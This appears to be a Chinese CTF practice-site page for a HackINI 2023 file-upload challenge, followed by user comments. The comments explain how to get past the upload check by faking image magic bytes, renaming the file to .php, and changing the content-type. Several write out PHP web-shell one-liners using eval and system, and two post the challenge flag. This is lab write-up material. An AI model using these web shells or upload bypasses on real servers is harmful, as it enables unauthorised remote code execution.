Upload 1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2023
题目作者: 未知
一  血: 18718578940
一血奖励: 0金币
解  决: 610
提  示:
描  述:
We added a verification. Bypass it. **Author**: souad
评论
lunarbyside 1月前

不用上传图片吧,也不检测文件后缀,只检测文件头,在php文件里面写三个字符以上加上一句话木马,然后用010修改前三个字节为FF D8 FF就绕过了。

回复 0

ymkiras 3月前

这里可以用qq截图只截1的像素点就可以得到只有字节大小的图片,然后抓包png头不要动,更改文件名变成.php,然后改content-type,然后植入命令内容就跟第一题一样了,PNG头不要动,其他你随便怎么改,改了头大部分情况下就是不安全的

回复 0

MoCaser 4月前

看了wp和评论区,但还是失败了,要么是文件太大要么是图片码被检测出不安全

回复 0

admin9101 8月前

GIF89a <?php system('cat /flag.txt');?>

回复 0

北橘 9月前

shellmates{PoLyg10t_F1l3s_Byp4$S}

回复 0

007 10月前

shellmates{PoLyg10t_F1l3s_Byp4$S}}

回复 0

Garmin 11月前

上传个小图片,上传时用bp抓包加一句话木马再上传即可

回复 0

chouchou 1年前

编写一个php文件 GIF89a <?php echo "<pre>"; system('cat /flag.txt'); echo "</pre>"; #@eval($_POST['s']); ?> 先绕过对php的检查,然后再php中执行shell

回复 0

pb9231 1年前

尝试上传图片文件,发现可以上传(图片要小), 用010 editor 打开图片将php一句话木马<?php @eval($_POST['shell']);?>写入图片末尾,保存后修改图片扩展名为.php 上传图片成功,用蚁剑连接,在根目录下找到flag.txt

回复 0
vanfor 1年前

@TheShy师傅 内容太长了被过滤掉了

回复 0

TheShy师傅 1年前

为什么我一上传就显示页面丢失,什么都不返回给我?无论是什么免杀木马都不行?

回复 0

cqy123 1年前

上传了一个很小的图片,然后抓包,图片内容的头不要动,后面加入一句话木马,乙箭链接

回复 0

WriteUp

image
yangbo

2 金币

评分(1)

解题动态

17335918325 攻破了该题 15小时前
18516952839 攻破了该题 1天前
buuble123 攻破了该题 1天前
你不懂的吧 攻破了该题 6天前
百叶i 攻破了该题 9天前
cjydawn 攻破了该题 10天前
202541696 攻破了该题 16天前
violetyy 攻破了该题 16天前
Smlight 攻破了该题 22天前
15008241322 攻破了该题 24天前
hutouyu 攻破了该题 25天前
奕生 攻破了该题 25天前
略略略 攻破了该题 27天前
main123 攻破了该题 28天前
theo1234 攻破了该题 28天前
山职雇佣兵 攻破了该题 1月前
lunarbyside 攻破了该题 1月前
nuxe 攻破了该题 1月前
krioee 攻破了该题 1月前
冰点泡沫 攻破了该题 1月前
问题反馈